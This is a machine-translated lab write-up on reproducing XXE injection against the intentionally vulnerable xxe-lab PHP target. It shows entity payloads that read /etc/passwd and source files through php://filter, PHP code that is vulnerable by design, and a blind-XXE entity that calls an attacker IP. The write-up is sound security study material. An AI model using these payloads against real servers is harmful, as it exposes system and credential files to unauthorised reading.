Preface

Installation skipped ,xxe-lab There are several environments , Here is php
Learning records only , Do not use for illegal purposes
XXE Not very familiar with , If there are any mistakes, you can correct them in the comments

xxe-lab download

Vulnhub-XXE Target learning

DTD brief introduction

XXE_payload

BerylEnigma Coding tools

XML External entities （XXE） Inject detailed explanation

Security -php://filter The file contains analysis （bugku）

XXE Inject high-end operation attacks payload Summary

One 、 Enable environment

Turn on apache or nginx, visit http://127.0.0.1/xxe-lab-master/php_xxe/

If 127.0.0.1 I can't get the bag , You can use the intranet IP Visit the packet capture to view the submitted data

Two 、 Loophole recurrence

[1]. analysis

Use the playback module , It is found that... Will be returned in the return package username What's in it （ Slightly changed the format ）
So only will Entity Put it in username in , Will echo the value

[2]. structure payload

add to XML Statement （ It seems that you can do without this ）

<?xml version="1.0" encoding="UTF-8"?>

DTD Document type definition , Arbitrary file name will not affect , Be careful DOCTYPE Need to be capitalized
DOC Represents a document ,TYPE Translated as type

<!DOCTYPE  file name  []>

Then there is the statement XML Entities are used for file reading , Need to put in DOCTYPE Of test in

<!ENTITY  The entity name  SYSTEM "file:/// Absolute path ">

Then choose one that will echo the data xml Label placement & The entity name ;
c:/windows/win.ini yes windows The default configuration in
/etc/passwd yes linux Configuration of account information stored in

In the case of echo ,password call xml Solid time , No echo passwd The content of cannot pass password The label proves the existence xxe Loophole

[3]. Read file from relative path

• file The protocol is used to read absolute paths , If you need to read through a relative path, you can use php://filter
• post Data time , What I visited was doLogin.php file
  It needs to be based on the relative path to this file
• When reading with the parameters below, the contents of the file will be base64 Output

php://filter/read=convert.base64-encode/resource= File relative path 

• Read the current file doLogin.php file （ If you don't know what the file name is , You can use it intruder Blasting module ）,base64 After decoding, it is the content of the file
• The case of the file name will not affect

PD9waHAKLyoqCiogYXV0b3I6IGMwbnkxCiogZGF0ZTogMjAxOC0yLTcKKi8KCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICdhZG1pbic7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+

You can also use ../ Jump to the upper directory to read

IyB4eGUtbGFiCgohW1hYRS1MYWJdKGRvYy9YWEUtTEFCLnBuZykKCnh4ZS1sYWLmmK/kuIDkuKrkvb/nlKhwaHAsamF2YSxweXRob24sQyPlm5vnp43lvZPkuIvmnIDluLjnlKjor63oqIDnmoTnvZHnq5nnvJblhpnor63oqIDmnaXnvJblhpnnmoTkuIDkuKrlrZjlnKh4eGXmvI/mtJ7nmoR3ZWIgZGVtb+OAggoK55Sx5LqOeHhl55qEcGF5bG9hZOWcqOS4jeWQjOeahOivreiogOWGhee9rueahHhtbOino+aekOWZqOS4reino+aekOaViOaenOS4jeS4gOagt++8jOS4uuS6hueglOeptuWug+S7rOeahOS4jeWQjOOAguaIkeWIhuWIq+S9v+eUqOW9k+S4i+acgOW4uOeUqOeahOWbm+enjee9keermee8luWGmeivreiogOWGmeS6huWtmOWcqHh4Zea8j+a0nueahHdlYiBkb21lLOS4uuS6huS7peWQjuW+l+a1i+ivleaWueS+v++8jOWwseWwhui/meS6m2RlbW9l5pW05ZCI5Li6eHhlLWxhYuOAguS7o+eggeWKm+axgueugOa0geeugOWNle+8jOWwvemHj+WPquS9v+eUqOWOn+eUn+W6k++8jOWQjOaXtuWcqOazqOmHiumDqOWIhuWMheWQq+S6huS/ruWkjea8j+a0nueahOS7o+eggeOAgnJ1YnnniYjmnKzmnInml7bpl7Tlho3liqDlhaXvvIEKCiMjIOWuieijhQojIyMjIDEucGhwX3h4ZQoK55u05o6l5pS+5ZyocGhwIHdlYumhtemdouS4i+WNs+WPr+i/kOihjOOAggoKIyMjIyAyLmphdmFfeHhlCgpqYXZhX3h4ZeaYr3Nlcmx2ZXTpobnnm67vvIznm7TmjqXlr7zlhaVlY2xpcHNl5b2T5Lit5Y2z5Y+v6YOo572y6L+Q6KGM44CCCgojIyMjIDMucHl0aG9uX3h4ZTogCgoqIOWuieijheWlvUZsYXNr5qih5Z2XCiogcHl0aG9uIHh4ZS5weQoKIyMjIyA0LkNzaGFycF94eGUgCuebtOaOpeWvvOWFpVZT5Lit6L+Q6KGMCiMjIOS4u+eVjOmdogoKIVtwaHBfeHhlXShkb2MvcGhwX3h4ZS5wbmcpCgohW2phdmFfeHhlXShkb2MvamF2YV94eGUucG5nKQoKIVtweXRob25feHhlXShkb2MvcHl0aG9uX3h4ZS5wbmcpCgohW0NzaGFycF94eGVdKGRvYy9Dc2hhcnBfeHhlLnBuZykKCiMjIOa1i+ivlQrmkK3lu7rlpb3njq/looPlkI7lsLHlj6/ku6Xlr7nlkITkuKror63oqIDniYjmnKzov5vooYzmtYvor5XkuobjgILov5nph4zku6VQSFDkuLrkvovlrZDjgIIKCiFbcGhwIFhYRea8lOekul0oZG9jL3BocF94eGVfZGVtby5naWYpCg==

3、 ... and 、 No echo XXE

take doLogin.php Change to the following code , In this way, there will be no original username 了

<?php
/** * autor: c0ny1 * date: 2018-2-7 */

$USERNAME = 'admin'; // account number 
$PASSWORD = 'admin'; // password 
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
    
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
    
		$result = " Login successful ";
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
    
		$result = " Login failed ";
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}	
}catch(Exception $e){
    
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

If the goal is not to leave the network , have access to python Here's one http service
If the access record of the target is detected , That means there is xxe There's a leak

python -m http.server [ port ]

python2 Start with the following code http service

python -m SimpleHTTPServer [ port ]

then post As follows xml sentence

<!DOCTYPE test[ <!ENTITY data SYSTEM "http:// The attacker IP: port "> ]>

Because the submitted username and password Are processed by the server , But none of them echo
So without echo , These two parameters call xml Entities will trigger vulnerabilities